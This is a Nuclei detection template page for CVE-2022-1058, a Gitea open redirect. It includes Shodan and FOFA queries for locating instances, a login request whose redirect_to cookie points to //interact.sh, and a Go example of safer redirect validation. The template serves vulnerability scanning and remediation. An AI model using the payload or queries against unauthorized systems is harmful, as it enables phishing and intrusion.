Gitea <1.16.5 - Open Redirect
ID: CVE-2022-1058
Severity: medium
Author: theamanrawat
Tags: cve,cve2022,huntr,open-redirect,gitea
Description
Gitea before 1.16.5 is susceptible to open redirect via GitHub repository go-gitea/gitea. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
YAML Source
```yaml
id: CVE-2022-1058

info:
  name: Gitea <1.16.5 - Open Redirect
  author: theamanrawat
  severity: medium
  description: |
    Gitea before 1.16.5 is susceptible to open redirect via GitHub repository go-gitea/gitea. An attacker can redirect a user to a malicious site and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
  remediation: |
    Upgrade Gitea to version 1.16.5 or later to fix the open redirect vulnerability.
  reference:
    - https://github.com/go-gitea/gitea/commit/e3d8e92bdc67562783de9a76b5b7842b68daeb48
    - https://huntr.dev/bounties/4fb42144-ac70-4f76-a5e1-ef6b5e55dc0d
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1058
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-1058
    cwe-id: CWE-601
    epss-score: 0.001
    epss-percentile: 0.40832
    cpe: cpe:2.3:a:gitea:gitea:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: gitea
    product: gitea
    shodan-query:
      - title:"Gitea"
      - http.html:"powered by gitea version"
      - http.title:"gitea"
      - cpe:"cpe:2.3:a:gitea:gitea"
    fofa-query:
      - body="powered by gitea version"
      - title="gitea"
    google-query: intitle:"gitea"
  tags: cve,cve2022,huntr,open-redirect,gitea

http:
  - raw:
      - |
        GET /user/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: redirect_to=//interact.sh

        _csrf={{csrf}}&user_name={{username}}&password={{url_encode(password)}}

    matchers-condition: and
    matchers:
      - type: word
        part: header_2
        words:
          - "//interact.sh"

      - type: status
        status:
          - 302

    extractors:
      - type: regex
        name: csrf
        group: 1
        regex:
          - 'name="_csrf" value="(.*)"'
        internal: true
# digest: 4a0a00473045022100caee168754629ced22374c5abbe6fcc9a6c0679963286316450bf9a516c9248e02207042d9e96eadd5ed6132e60aedfc9a8bfe6275b72d50fc7e54a4bd626a1f7509:922c64590222798bb761d5b6d8e72950
```

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-1058.yaml"
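
The template's second request sets `redirect_to=//interact.sh`, a scheme-relative URL that begins with a slash and therefore passes a prefix-only "is it a local path" check. The Go sketch below is an added example, not Gitea's code or the fix from the referenced commit; the function names and the `/` fallback are assumptions made for illustration.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// naiveIsLocal is the kind of check the template's payload gets past:
// it only asks whether the value starts with a slash.
func naiveIsLocal(target string) bool {
	return strings.HasPrefix(target, "/")
}

// isSafeRedirect accepts only same-site, path-absolute targets.
func isSafeRedirect(target string) bool {
	if len(target) == 0 || target[0] != '/' {
		return false
	}
	// "//host" is scheme-relative; browsers also treat "/\host" that way.
	if len(target) > 1 && (target[1] == '/' || target[1] == '\\') {
		return false
	}
	// Browsers strip tab, CR and LF before parsing, so "/\t/host" becomes "//host".
	if strings.ContainsAny(target, "\t\r\n") {
		return false
	}
	u, err := url.Parse(target)
	if err != nil {
		return false
	}
	return u.Scheme == "" && u.Host == ""
}

// redirectAfterLogin returns the post-login Location value, falling back to
// a fixed local path (hypothetical default) when the cookie value is unsafe.
func redirectAfterLogin(cookieValue string) string {
	if isSafeRedirect(cookieValue) {
		return cookieValue
	}
	return "/"
}

func main() {
	// Constructed sample cookie values; the first is the one the template sends.
	for _, v := range []string{"//interact.sh", "/\\interact.sh", "https://interact.sh", "/user/settings"} {
		fmt.Printf("%-22q naive=%-5v safe=%-5v -> %s\n", v, naiveIsLocal(v), isSafeRedirect(v), redirectAfterLogin(v))
	}
}
```

With a check of this shape in place, the template's `header_2` word matcher would no longer find `//interact.sh` in the 302 response.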